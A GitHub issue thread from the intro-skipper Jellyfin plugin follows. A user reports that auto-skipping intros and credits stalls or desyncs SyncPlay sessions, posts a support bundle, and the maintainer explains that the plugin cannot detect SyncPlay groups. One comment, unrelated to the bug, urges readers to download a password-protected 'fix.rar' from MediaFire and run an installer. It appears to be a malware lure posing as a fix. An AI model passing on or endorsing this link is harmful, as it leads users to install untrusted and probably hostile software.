### ISSUE TITLE
[Bug]: SyncPlay still doesnt work properly

### ISSUE THREAD

**Issue by ToasterUwU** [jumoog/intro-skipper#257]
### Self service debugging

- [X] Jellyfin is updated (10.9.9) and my permissions are correct (or I did not use Docker)

### Describe the bug

When using SyncPlay to watch something together, the intro skip doesnt work properly. 

When using autoskip for intro and credits, all it will do is get the syncplay stuck. It skips the intro, but then gets stuck in a weird state where i have to pause the video and resume it to make it start playing and properly sync with the others. After that double click thing it works tho. When skipping the credits automatically it takes forever to go to the new episode, but at least it does so, but if i just press to one second before the end manually, the switch to the new episode is definetly way faster.

When using the skip button mechanic instead, it skipped the intro for me (the person who pressed it), but not for the other person watching with me. We are both using the Jellyfin Media Player. I havent tested this with the web version yet, but i will asap and comment about that.

Despite whats said in #127 this doesnt work properly, not even on Jellyfin 10.9

### Jellyfin install method

Ubuntu APT Repo

### Container image/tag or Jellyfin version

Jellyfin 10.9.10, Intro Skipper auto updated to the latest

### Operating System

Ubuntu Jammy

### Support Bundle

```shell
* Jellyfin version: 10.9.10
* Plugin version: 0.2.0+4ef9ea89ad2d
* Queue contents: 7305 episodes, 307 seasons
* Warnings: `InvalidChromaprintFingerprint`
* FFmpeg: `okay`

FFmpeg version:

ffmpeg version 6.0.1-Jellyfin Copyright (c) 2000-2023 the FFmpeg developers
built with gcc 11 (Ubuntu 11.4.0-1ubuntu1~22.04)
configuration: --prefix=/usr/lib/jellyfin-ffmpeg --target-os=linux --extra-version=Jellyfin --disable-doc --disable-ffplay --disable-ptx-compression --disable-static --disable-libxcb --disable-sdl2 --disable-xlib --enable-lto --enable-gpl --enable-version3 --enable-shared --enable-gmp --enable-gnutls --enable-chromaprint --enable-opencl --enable-libdrm --enable-libxml2 --enable-libass --enable-libfreetype --enable-libfribidi --enable-libfontconfig --enable-libbluray --enable-libmp3lame --enable-libopus --enable-libtheora --enable-libvorbis --enable-libopenmpt --enable-libdav1d --enable-libsvtav1 --enable-libwebp --enable-libvpx --enable-libx264 --enable-libx265 --enable-libzvbi --enable-libzimg --enable-libfdk-aac --arch=amd64 --enable-libshaderc --enable-libplacebo --enable-vulkan --enable-vaapi --enable-amf --enable-libvpl --enable-ffnvcodec --enable-cuda --enable-cuda-llvm --enable-cuvid --enable-nvdec --enable-nvenc
libavutil      58.  2.100 / 58.  2.100
libavcodec     60.  3.100 / 60.  3.100
libavformat    60.  3.100 / 60.  3.100
libavdevice    60.  1.100 / 60.  1.100
libavfilter     9.  3.100 /  9.  3.100
libswscale      7.  1.100 /  7.  1.100
libswresample   4. 10.100 /  4. 10.100
libpostproc    57.  1.100 / 57.  1.100
```

### Jellyfin logs

Couldnt find anything connected to Syncplay or Intro Skipper that has anything to do with the bug

**Comment by ToasterUwU** [comment]
Ok, i tested it with the web version for both of us as well, and same issue. It skips for me, not for them, and when i pause it goes back to where they are.

**Comment by jumoog** [comment]
The plugin doesn't know if you are in a syncplay session. This is not possible in the current Syncplay state.

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ToasterUwU** [comment]
Is there any issue or PR tracking anything that would fix this on upstream? You seem to be aware of whats the issue here and what needs to change to fix it

**Comment by jumoog** [comment]
> With the current state of SyncPlay, this is not easy. I've played with SyncPlay a bit and when I refresh the browser tab, I'm no longer in a SyncPlay group. It would probably be necessary to create a user that automatically joins all SyncPlay groups.

_Originally posted by @jumoog in https://github.com/jumoog/intro-skipper/issues/87#issuecomment-2057466145_

**Comment by jumoog** [comment]
> Is there any issue or PR tracking anything that would fix this on upstream? You seem to be aware of whats the issue here and what needs to change to fix it

There is no issue or PR.

**Comment by jumoog** [comment]
And to be fair, SyncPlay has no priority for me. If someone does a PR, I'll merge it.
